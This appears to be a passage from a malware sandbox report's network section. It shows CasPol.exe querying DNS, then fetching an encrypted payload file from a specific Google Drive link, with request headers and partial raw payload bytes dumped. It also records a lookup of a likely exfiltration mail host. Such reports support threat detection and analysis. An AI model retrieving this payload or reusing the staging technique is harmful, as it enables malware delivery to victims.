                                                  Nov 29, 2021 15:53:52.011914968 CET44349808142.250.184.225192.168.11.20
                                                  Nov 29, 2021 15:53:52.012126923 CET49808443192.168.11.20142.250.184.225
                                                  Nov 29, 2021 15:53:52.012518883 CET49808443192.168.11.20142.250.184.225
                                                  Nov 29, 2021 15:53:52.055850029 CET44349808142.250.184.225192.168.11.20
                                                  Nov 29, 2021 15:53:52.346968889 CET44349808142.250.184.225192.168.11.20
                                                  Nov 29, 2021 15:53:52.347215891 CET44349808142.250.184.225192.168.11.20
                                                  Nov 29, 2021 15:53:52.347233057 CET49808443192.168.11.20142.250.184.225
                                                  Nov 29, 2021 15:53:52.347285986 CET44349808142.250.184.225192.168.11.20
                                                  Nov 29, 2021 15:53:52.347399950 CET49808443192.168.11.20142.250.184.225
                                                  Nov 29, 2021 15:53:52.347480059 CET44349808142.250.184.225192.168.11.20
                                                  Nov 29, 2021 15:53:52.347570896 CET49808443192.168.11.20142.250.184.225
                                                  Nov 29, 2021 15:53:52.347615957 CET44349808142.250.184.225192.168.11.20
                                                  Nov 29, 2021 15:53:52.347840071 CET49808443192.168.11.20142.250.184.225
                                                  Nov 29, 2021 15:53:52.347872972 CET49808443192.168.11.20142.250.184.225
                                                  Nov 29, 2021 15:53:52.348323107 CET44349808142.250.184.225192.168.11.20
                                                  Nov 29, 2021 15:53:52.348692894 CET49808443192.168.11.20142.250.184.225
                                                  Nov 29, 2021 15:53:52.349246979 CET44349808142.250.184.225192.168.11.20
                                                  Nov 29, 2021 15:53:52.349410057 CET44349808142.250.184.225192.168.11.20
                                                  Nov 29, 2021 15:53:52.349505901 CET49808443192.168.11.20142.250.184.225
                                                  Nov 29, 2021 15:53:52.349564075 CET44349808142.250.184.225192.168.11.20
                                                  Nov 29, 2021 15:53:52.349822998 CET49808443192.168.11.20142.250.184.225
                                                  Nov 29, 2021 15:53:52.349865913 CET49808443192.168.11.20142.250.184.225
                                                  Nov 29, 2021 15:53:52.350112915 CET44349808142.250.184.225192.168.11.20
                                                  Nov 29, 2021 15:53:52.350367069 CET49808443192.168.11.20142.250.184.225
                                                  Nov 29, 2021 15:53:52.357939959 CET44349808142.250.184.225192.168.11.20
                                                  Nov 29, 2021 15:53:52.358131886 CET44349808142.250.184.225192.168.11.20
                                                  Nov 29, 2021 15:53:52.358210087 CET49808443192.168.11.20142.250.184.225
                                                  Nov 29, 2021 15:53:52.358231068 CET44349808142.250.184.225192.168.11.20
                                                  Nov 29, 2021 15:53:52.358252048 CET44349808142.250.184.225192.168.11.20
                                                  Nov 29, 2021 15:53:52.358484030 CET49808443192.168.11.20142.250.184.225
                                                  Nov 29, 2021 15:53:52.358536005 CET44349808142.250.184.225192.168.11.20
                                                  Nov 29, 2021 15:53:52.358550072 CET49808443192.168.11.20142.250.184.225
                                                  Nov 29, 2021 15:53:52.358567953 CET44349808142.250.184.225192.168.11.20
                                                  Nov 29, 2021 15:53:52.358856916 CET49808443192.168.11.20142.250.184.225
                                                  Nov 29, 2021 15:53:52.358894110 CET49808443192.168.11.20142.250.184.225
                                                  Nov 29, 2021 15:53:52.359203100 CET44349808142.250.184.225192.168.11.20
                                                  Nov 29, 2021 15:53:52.359360933 CET44349808142.250.184.225192.168.11.20
                                                  Nov 29, 2021 15:53:52.359452009 CET49808443192.168.11.20142.250.184.225
                                                  Nov 29, 2021 15:53:52.359505892 CET44349808142.250.184.225192.168.11.20
                                                  Nov 29, 2021 15:53:52.359610081 CET49808443192.168.11.20142.250.184.225
                                                  Nov 29, 2021 15:53:52.359730959 CET49808443192.168.11.20142.250.184.225
                                                  Nov 29, 2021 15:53:52.360255957 CET44349808142.250.184.225192.168.11.20
                                                  Nov 29, 2021 15:53:52.360424042 CET44349808142.250.184.225192.168.11.20
                                                  Nov 29, 2021 15:53:52.360503912 CET49808443192.168.11.20142.250.184.225
                                                  Nov 29, 2021 15:53:52.360559940 CET44349808142.250.184.225192.168.11.20
                                                  Nov 29, 2021 15:53:52.360662937 CET49808443192.168.11.20142.250.184.225
                                                  Nov 29, 2021 15:53:52.360707045 CET49808443192.168.11.20142.250.184.225
                                                  Nov 29, 2021 15:53:52.361234903 CET44349808142.250.184.225192.168.11.20
                                                  Nov 29, 2021 15:53:52.361396074 CET44349808142.250.184.225192.168.11.20
                                                  Nov 29, 2021 15:53:52.361516953 CET49808443192.168.11.20142.250.184.225
                                                  Nov 29, 2021 15:53:52.361568928 CET44349808142.250.184.225192.168.11.20
                                                  Nov 29, 2021 15:53:52.361673117 CET49808443192.168.11.20142.250.184.225
                                                  Nov 29, 2021 15:53:52.361845016 CET49808443192.168.11.20142.250.184.225
                                                  Nov 29, 2021 15:53:52.362216949 CET44349808142.250.184.225192.168.11.20
                                                  Nov 29, 2021 15:53:52.362410069 CET49808443192.168.11.20142.250.184.225
                                                  Nov 29, 2021 15:53:52.362415075 CET44349808142.250.184.225192.168.11.20
                                                  Nov 29, 2021 15:53:52.362462044 CET44349808142.250.184.225192.168.11.20
                                                  Nov 29, 2021 15:53:52.362745047 CET49808443192.168.11.20142.250.184.225
                                                  Nov 29, 2021 15:53:52.362759113 CET49808443192.168.11.20142.250.184.225
                                                  Nov 29, 2021 15:53:52.363019943 CET44349808142.250.184.225192.168.11.20
                                                  Nov 29, 2021 15:53:52.363178015 CET44349808142.250.184.225192.168.11.20
                                                  Nov 29, 2021 15:53:52.363277912 CET49808443192.168.11.20142.250.184.225
                                                  Nov 29, 2021 15:53:52.363329887 CET44349808142.250.184.225192.168.11.20
                                                  Nov 29, 2021 15:53:52.363434076 CET49808443192.168.11.20142.250.184.225

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Nov 29, 2021 15:53:51.329303980 CET5274053192.168.11.201.1.1.1
                                                  Nov 29, 2021 15:53:51.338949919 CET53527401.1.1.1192.168.11.20
                                                  Nov 29, 2021 15:53:51.918389082 CET5680453192.168.11.201.1.1.1
                                                  Nov 29, 2021 15:53:51.958292961 CET53568041.1.1.1192.168.11.20
                                                  Nov 29, 2021 15:55:27.419835091 CET6345353192.168.11.201.1.1.1
                                                  Nov 29, 2021 15:55:27.510488033 CET53634531.1.1.1192.168.11.20

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                  Nov 29, 2021 15:53:51.329303980 CET192.168.11.201.1.1.10xb8d8Standard query (0)drive.google.comA (IP address)IN (0x0001)
                                                  Nov 29, 2021 15:53:51.918389082 CET192.168.11.201.1.1.10x742eStandard query (0)doc-08-9o-docs.googleusercontent.comA (IP address)IN (0x0001)
                                                  Nov 29, 2021 15:55:27.419835091 CET192.168.11.201.1.1.10x11c3Standard query (0)mail.furteksdokuma.com.trA (IP address)IN (0x0001)

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                  Nov 29, 2021 15:53:51.338949919 CET1.1.1.1192.168.11.200xb8d8No error (0)drive.google.com142.250.186.46A (IP address)IN (0x0001)
                                                  Nov 29, 2021 15:53:51.958292961 CET1.1.1.1192.168.11.200x742eNo error (0)doc-08-9o-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                  Nov 29, 2021 15:53:51.958292961 CET1.1.1.1192.168.11.200x742eNo error (0)googlehosted.l.googleusercontent.com142.250.184.225A (IP address)IN (0x0001)
                                                  Nov 29, 2021 15:55:27.510488033 CET1.1.1.1192.168.11.200x11c3No error (0)mail.furteksdokuma.com.trfurteksdokuma.com.trCNAME (Canonical name)IN (0x0001)
                                                  Nov 29, 2021 15:55:27.510488033 CET1.1.1.1192.168.11.200x11c3No error (0)furteksdokuma.com.tr116.202.203.61A (IP address)IN (0x0001)

                                                  HTTP Request Dependency Graph

                                                  • drive.google.com
                                                  • doc-08-9o-docs.googleusercontent.com

                                                  HTTPS Proxied Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  0192.168.11.2049807142.250.186.46443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                  TimestampkBytes transferredDirectionData
                                                  2021-11-29 14:53:51 UTC0OUTGET /uc?export=download&id=1iiNs60l202FEGNx6v3EUfjeUKv3OYnXz HTTP/1.1
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Host: drive.google.com
                                                  Cache-Control: no-cache
                                                  2021-11-29 14:53:51 UTC0INHTTP/1.1 302 Moved Temporarily
                                                  Content-Type: text/html; charset=UTF-8
                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                  Pragma: no-cache
                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                  Date: Mon, 29 Nov 2021 14:53:51 GMT
                                                  Location: https://doc-08-9o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ga7kf072sq22koh6kdm9b8ejprnrarqv/1638197625000/10571010296728974958/*/1iiNs60l202FEGNx6v3EUfjeUKv3OYnXz?e=download
                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                                                  Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                                                  Content-Security-Policy: script-src 'nonce-Jp++AYoLJJc5Ud3ZX7I3Rw' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                                  X-Content-Type-Options: nosniff
                                                  X-Frame-Options: SAMEORIGIN
                                                  X-XSS-Protection: 1; mode=block
                                                  Server: GSE
                                                  Set-Cookie: NID=511=tNDDXK4MKNqws-q91tHDlsMBOH6MNhs008ShLPJmVRfqw2v2EYPllo9917b91pQaddlkk5oT-Gt6ui9wk0bZJYjfZsQPShhvvHo-7sY8OR0UpTxiS0FQGIT8YgboiuTiLa_Mfw_Nyy2nvj2Vr6VEEQV5E1L9yXV0dnDBBTu9pZE; expires=Tue, 31-May-2022 14:53:51 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                  Accept-Ranges: none
                                                  Vary: Accept-Encoding
                                                  Connection: close
                                                  Transfer-Encoding: chunked
                                                  2021-11-29 14:53:51 UTC1INData Raw: 31 38 34 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 38 2d 39 6f 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 67 61 37 6b
                                                  Data Ascii: 184<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-08-9o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ga7k
                                                  2021-11-29 14:53:51 UTC2INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  1192.168.11.2049808142.250.184.225443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                  TimestampkBytes transferredDirectionData
                                                  2021-11-29 14:53:52 UTC2OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ga7kf072sq22koh6kdm9b8ejprnrarqv/1638197625000/10571010296728974958/*/1iiNs60l202FEGNx6v3EUfjeUKv3OYnXz?e=download HTTP/1.1
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Cache-Control: no-cache
                                                  Host: doc-08-9o-docs.googleusercontent.com
                                                  Connection: Keep-Alive
                                                  2021-11-29 14:53:52 UTC2INHTTP/1.1 200 OK
                                                  X-GUploader-UploadID: ADPycduSCKwclBOjAwFYra7AFRSaEs1Z87BBg1Xmek1u-7anfXa9tD8GHPOK9aDJ0q5zZ1O66zPQh-VqeKn36jlr7-g
                                                  Access-Control-Allow-Origin: *
                                                  Access-Control-Allow-Credentials: false
                                                  Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout
                                                  Access-Control-Allow-Methods: GET,OPTIONS
                                                  Content-Type: application/octet-stream
                                                  Content-Disposition: attachment;filename="mpaa_ripcwNf159.bin";filename*=UTF-8''mpaa_ripcwNf159.bin
                                                  Content-Length: 221760
                                                  Date: Mon, 29 Nov 2021 14:53:52 GMT
                                                  Expires: Mon, 29 Nov 2021 14:53:52 GMT
                                                  Cache-Control: private, max-age=0
                                                  X-Goog-Hash: crc32c=4elgWQ==
                                                  Server: UploadServer
                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                  Connection: close
                                                  2021-11-29 14:53:52 UTC6INData Raw: 43 72 38 9f 89 8e 40 7f 09 13 12 2a 28 0f 0f a5 04 61 b4 c3 5a b9 2e bb 69 95 87 ac 55 dc 89 83 8b c4 b1 2b 6d 01 94 fd 24 e0 6a d4 ba 46 e6 2d ef c5 0e 63 a2 00 7b ff 7b d1 7a be 80 72 84 4c 5a 97 6a 6d 60 d7 ae c9 2c f4 2e c7 b7 17 ec 8e 13 de 28 6a ae f0 39 07 ea 6c d9 fa 9c f6 2a 85 60 64 b7 c4 fe 52 b7 5f 26 3a 41 9d dd 19 4f c8 94 c2 0e 9b fd 16 4d f4 45 92 43 9c 29 25 c3 68 c4 18 18 d0 2f 00 82 5d 04 1b 59 b4 25 04 15 f9 d0 3d 7d 5a cd cb a3 d9 8d 55 66 62 e0 e0 a6 bd a2 1d 67 39 76 a6 f2 db db a2 47 06 7a 3d c4 18 d3 5b 37 95 6c 91 58 ba ef 1f 43 d5 7f ab df 6a 89 af e8 0d b6 b4 db e9 09 9a f7 ad 43 11 22 d4 49 a9 c1 ed e5 29 c1 8d 96 ce ff 4e 22 96 ec 23 a4 56 b6 b7 e4 8e c4 a6 1e 34 fc 39 d7 dd 66 c3 67 12 09 77 8c 23 f4 e9 47 86 63 3b 74 96 1b
                                                  Data Ascii: Cr8@*(aZ.iU+m$jF-c{{zrLZjm`,.(j9l*`dR_&:AOMEC)%h/]Y%=}ZUfbg9vGz=[7lXCjC"I)N"#V49fgw#Gc;t
                                                  2021-11-29 14:53:52 UTC9INData Raw: ad b0 7a 10 6f 3b 63 94 7e 6d d4 4c 20 1b 12 3f cb dd ce e9 29 3b ab 94 41 18 44 90 cf 83 90 7e 71 7b a9 bd f5 d0 06 5b db fa 5b 5e e0 ba cb 34 d6 0c dc 59 99 98 54 02 30 d0 49 a1 60 ac 51 de 5e 4d a2 a9 e5 00 82 69 b6 af 3c c2 17 e9 a8 77 f7 4b 62 d9 88 0b 75 c5 8a 6f 25 30 7c a8 9e ef 5b 67 60 a5 a1 c4 48 a4 8a 3c 92 ab 23 78 7d 08 3c 24 b7 19 4a e1 cc 67 12 fa 49 2a 27 9a 49 2b 74 7d 38 f2 75 db 21 de 94 b6 aa 86 2b 1a 5a 24 7a 8d 95 47 11 83 14 85 e1 37 9f f8 2f 49 4a 16 d5 16 ca e2 f8 02 85 e3 8d 1f 75 bd 93 45 5c b7 a6 4d 69 1c 9c 31 c5 a4 1d 72 18 36 6f 8a 29 96 a1 03 f5 41 80 ed d5 83 65 c5 8b f0 68 af 62 e3 9b 1b 8f 65 f5 ee a9 d5 bf 0e ba 16 31 18 ee 6c 1b 2f 1c 5b 63 1c 50 14 21 00 09 4c 19 e6 d4 ec 7f 32 1a 66 e7 a4 57 3c 1b 53 e8 a6 bf fe d6
                                                  Data Ascii: zo;c~mL ?);AD~q{[[^4YT0I`Q^Mi<wKbuo%0|[g`H<#x}<$JgI*'I+t}8u!+Z$zG7/IJuE\Mi1r6o)Aehbe1l/[cP!L2fW<S
                                                  2021-11-29 14:53:52 UTC13INData Raw: 95 52 0d 57 fc 29 ca a4 ad db 01 58 01 7f 53 c6 93 c1 46 15 98 b2 f0 8d 58 03 dd 61 b3 0d 11 14 40 c0 39 93 3e fa 8c 77 f2 71 d6 d0 28 49 cb a8 d4 31 14 a5 b3 24 22 22 cf d7 4f 46 18 2c b5 7c 72 f7 c0 cd f3 66 e1 ea 6f a6 95 5f e9 27 76 7f 16 9b fc f5 58 09 b4 90 fb 9f 9f 37 c5 2d 9e 44 b5 ce 1c 0f 9d 8d 48 27 1f b4 4d 33 0f be ef e1 06 52 e5 8b 37 6c 7a 29 89 97 b2 89 f0 46 5c 32 73 01 ae 45 87 ef 6c bb d3 d0 50 ac db 93 ca 01 95 f3 7f 57 5d 75 39 ad 12 5b fc e9 34 d4 0e e9 4c f5 4b 98 a7 ee 73 92 c4 06 30 87 63 33 27 db 8a 01 cc 6b a2 d5 2f 37 b8 df 5c 86 20 e2 49 3d f9 e6 11 86 ce 82 d5 77 22 e4 b4 ee 60 a5 fe cb 73 a1 2c be b3 43 8e 65 e5 59 b5 77 6b dd 29 5f 80 12 35 1d 2b 81 e3 05 3b 8b 60 16 18 4e b2 35 ab be 76 59 e6 a3 63 ed e7 3b d7 84 f0 73 71
                                                  Data Ascii: RW)XSFXa@9>wq(I1$""OF,|rfo_'vX7-DH'M3R7lz)F\2sElPW]u9[4LKs0c3'k/7\ I=w"`s,CeYwk)_5+;`N5vYc;sq
                                                  2021-11-29 14:53:52 UTC17INData Raw: e0 18 d6 3d 0f 1c dd d4 87 b5 ea ce 01 4d 3c 72 91 10 7d 36 53 f6 58 11 40 b0 cb 1e 50 95 6e eb c9 42 1d e8 e8 0b f2 9d 1c eb 07 18 5b eb 43 11 28 76 58 e9 d6 c5 c1 2b c3 8a 8c c6 dc 8a 20 ce e9 0b 83 5e b6 bd 46 9f 84 be 18 86 fd 39 d1 fb 4e 55 67 12 03 5f 48 21 b4 ef 6f 81 63 3b 7e 36 0a ff ac 1e e4 62 6c c4 9a 6c 66 33 8a 66 36 54 ba 5c 5a 72 29 4e f1 7e bf e9 0c 43 a6 42 20 1d 9f 2c b8 9d 4f 46 73 3f 8b 31 a8 e3 c6 38 12 f8 f2 19 db 06 b1 51 c4 d6 e7 47 30 4d 69 a8 bd 94 9f a6 e6 15 7b e3 11 46 2e 70 72 4b eb b0 c1 d1 fd c6 58 97 22 0a be 17 e9 2e a3 61 fd f1 51 e7 e0 46 82 79 9a a2 54 b5 ae 07 23 47 b9 16 a1 35 fe e7 3d b7 06 1e 50 d2 43 d7 b4 b8 d9 29 7b 07 62 ab ef 98 ca 4f 05 df 5a f0 8d 58 87 d2 75 9f c4 02 10 59 db c1 ba 20 f4 85 6c f2 70 d6 d0
                                                  Data Ascii: =M<r}6SX@PnB[C(vX+ ^F9NUg_H!oc;~6bllf3f6T\Zr)N~CB ,OFs?18QG0Mi{F.prKX".aQFyT#G5=PC){bOZXuY lp
                                                  2021-11-29 14:53:52 UTC18INData Raw: 46 ab ed 24 46 32 60 4c 15 24 74 77 4c d6 22 db 2b d2 5f c8 e1 e9 f9 10 5c 0e 35 0a 95 47 74 d7 2a e8 ea 31 88 e9 6f 49 4a 18 c4 3a c5 a5 77 00 85 ef a3 1d 39 bf 95 6b 1b e7 a6 4b 72 1d db ae c7 a4 11 35 6d 36 6f 8a 3b ef db 31 f5 4b 8d cc 7c 83 64 c5 8a ba 13 98 62 e9 b9 46 b0 71 e0 ff a9 c3 bf 0e ba dd 54 92 ee 6c 65 26 73 0f 67 04 1a 84 26 6f 51 57 94 f9 63 fb a8 ac 71 77 a7 b3 72 f0 01 4b 9d 5d ae be cb 3f 34 d6 35 b1 35 c3 c9 ef a0 33 d8 b7 85 38 0c 3e 55 ba b9 b5 dc ba 75 4b 8f ac c9 2e 56 3f 87 51 c0 95 8e ab d4 3b 28 bc b2 47 11 aa 6c dd d2 e6 f6 2a 8f c2 75 f7 de d6 34 b5 5f 20 98 50 dd f5 62 4f c8 9e ea 69 99 fd 10 65 dc 45 92 45 8d ae 4a 11 68 ca 0d 8a 0e 2d b4 8d b8 0b a1 58 fe 87 5d 41 91 b3 66 35 28 bf a2 ec d7 ec 38 4c 29 af 8e c8 d4 0b b0
                                                  Data Ascii: F$F2`L$twL"+_\5Gt*1oIJ:w9kKr5m6o;1K|dbFqTle&sg&oQWcqwrK]?45538>UuK.V?Q;(Gl*u4_ PbOieEEJh-X]Af5(8L)
                                                  2021-11-29 14:53:52 UTC19INData Raw: b4 b9 38 dc 23 c7 d5 46 5f 3f 43 b7 7c 6e 55 dd df f7 66 f0 ee 4a 51 94 73 e4 30 65 7b 57 83 f8 ea 4f f7 b5 bc e3 b4 9a 0e 2d d0 61 bb e2 b9 05 0f 93 89 60 03 41 bd 47 19 13 8e ed e1 14 53 e5 8a 3f 6c 7a 38 f2 95 99 92 fe 41 4b cc 09 24 ac 5d 83 ef 6b ad 37 d1 7c af cc 98 ca 06 07 04 7e 7b 51 5e 3b 86 69 7a 89 eb 3b d2 0c c1 cd f5 4b 93 8f 98 71 92 65 27 ab 87 6d 39 38 d1 b3 57 cc 6b af fd b4 37 a2 d5 43 8d ac bd 49 3d 39 c7 8a 86 c0 88 fd 00 ef ed b2 c6 f4 a5 fe c1 41 d9 2e bf b5 6b 15 65 3b 5a 9d 52 65 dd 23 77 f7 1b 35 17 0c c4 e1 05 27 a3 fb 17 18 44 9a 13 50 b7 7c 71 73 a3 63 e7 f1 3b 5b db ff 73 70 e2 a0 cd 3e ff 34 dc 59 93 5e 5e 04 1a de 49 a1 61 a2 5b de 5c 42 db a9 f3 95 82 63 b7 af 3c c2 15 dc fb 77 b5 de 62 d3 88 48 7f c5 8a 60 25 30 d1 1f 9e
                                                  Data Ascii: 8#F_?C|nUfJQs0e{WO-a`AGS?lz8AK$]k7|~{Q^;iz;Kqe'm98Wk7CI=9A.ke;ZRe#w5'DP|qsc;[sp>4Y^^Ia[\Bc<wbH`%0
                                                  2021-11-29 14:53:52 UTC20INData Raw: 6f 98 a3 45 5d 2d a4 5a c5 87 e4 10 68 03 81 88 e2 ce dd 3d 02 46 a8 d5 ab be f9 a4 e0 26 3e 78 81 0b 12 2f 58 f0 45 8a ab b1 e7 1d 54 de 7f ac c1 94 d8 c6 ea 26 ff 8d a4 16 f8 e1 75 e6 43 11 22 c7 79 ab c1 71 05 29 c3 ab 9d cf e5 58 31 ca d7 a0 a4 5e b6 b7 f5 8a d8 58 31 6e eb 3e b8 90 66 c3 6d 10 66 87 8c 23 be d0 28 a6 63 3b 69 87 1f bf a4 32 3b 9e 6d ee 8c 63 46 3f 81 7a 2f 78 7e 4f 5e 63 ff 68 dd 7d ad 58 19 03 9f 8d 39 e3 94 28 d1 89 43 5a 48 1c 8b 20 a6 94 f4 39 3e fb e2 bc db 06 bb 22 d3 c5 e3 43 4d 61 b1 54 bc be b2 7b cc 0b 62 19 10 29 24 6a 8c 4e ab 9d 2c f2 e6 d3 74 5d 33 0e a2 17 e9 62 8c 19 ff f2 79 31 e6 58 7a 69 bf 88 4d b2 96 79 f4 9f 46 1e bc 8c 3f ef 34 33 97 3d c5 ec a1 ce 84 ba df 86 4b 05 62 85 c7 bf db 67 d6 b2 97 f6 87 21 7f c2 72
                                                  Data Ascii: oE]-Zh=F&>x/XET&uC"yq)X1^X1n>fmf#(c;i2;mcF?z/x~O^ch}X9(CZH 9>"CMaT{b)$jN,t]3by1XziMyF?43=Kbg!r
                                                  2021-11-29 14:53:52 UTC22INData Raw: ea d1 eb f1 71 9d 39 60 d3 8e 64 0d c5 8a 65 2f 2d dd 05 96 e2 50 99 61 88 b4 f3 65 df 9d 3d 98 2b 3e 78 7d 1d 21 1e f2 19 42 f4 a8 aa 13 d6 43 27 3a cc 1a 2b 74 73 f5 a6 64 d7 2b d0 9b 27 e7 aa 39 38 58 04 5a c5 fa ba 7e ce 1e ea 15 31 88 9d 6b 50 46 1c db 12 06 8c 9b 11 83 c1 6c 35 39 b9 bb ab 31 e7 a0 22 1b 1a b4 76 cd b8 17 1d 41 29 61 7e 2e d5 f8 04 ec 35 93 ea a1 bd c7 da 85 93 3b a7 74 17 b2 79 8f 72 ff f8 89 e4 ad f0 b1 2c 73 b8 eb 54 68 d6 8c f0 49 1c 5a 18 3d 5f 55 4c d2 ec 63 fb 83 bf 31 77 e5 8d a5 3f 03 41 f4 cb bf fe d6 2e 16 d6 35 bf 17 5b 78 ef a6 1b aa 9d b2 3e 63 4c 59 b8 9b e8 cd fa 67 70 d3 8e c9 2c f4 2e 4a 33 e8 ec 8f a6 0e 54 6a ae f1 11 13 aa 6c d3 d2 9c f7 2a 8f 69 ea 00 1c 46 41 b2 49 2d 2b 45 f2 dc 18 4f c2 9d d3 0b 89 fc 3e 0c
                                                  Data Ascii: q9`de/-Pae=+>x}!BC':+tsd+'98XZ~1kPFl591"vA)a~.5;tyr,sThIZ=_ULc1w?A.5[x>cLYgp,.J3Tjl*iFAI-+EO>
